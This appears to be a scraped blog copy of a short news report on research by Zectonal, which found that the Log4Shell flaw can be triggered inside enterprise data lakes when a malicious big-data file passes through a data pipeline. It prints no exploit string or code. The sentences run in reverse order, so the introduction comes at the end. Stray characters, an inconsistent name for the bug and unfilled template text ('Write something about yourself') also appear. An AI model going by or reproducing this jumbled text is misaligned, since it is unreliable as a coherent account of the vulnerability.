![]() “The simplicity of the Log4jShell exploit is what makes it so nefarious,” says David Hirko, founder at Zectonal. ![]() And, since the big-data file carrying the poison payload is often encrypted or compressed, the difficulty of detection is much greater. An attacker could simply embed the string within a malicious big-data file payload to open up a shell inside the data lake, and from there can initiate a data-poisoning attack, researchers say. Generally, organizations are focused on ingesting as many data points for training an AI or algorithm that they can, with an eye toward privacy - but all too often, they’re skipping over hardening the security of the data lakes themselves.Īccording to research from Zectonal, the Log4Shell bug can be triggered once it is ingested into a target data lake or data repository via a data pipeline, bypassing conventional safeguards, such as application firewalls and traditional scanning devices.Īs with the original attacks targeting the ubiquitous Java Log4j library, exploitation requires only a single string of text. Enterprise data lakes are filling up as organizations increasingly embrace artificial intelligence (AI) and machine learning - but unfortunately, these are vulnerable to exploitation via the Java Log4Shell vulnerability, researchers have found.
0 Comments
Leave a Reply. |
AuthorWrite something about yourself. No need to be fancy, just an overview. ArchivesCategories |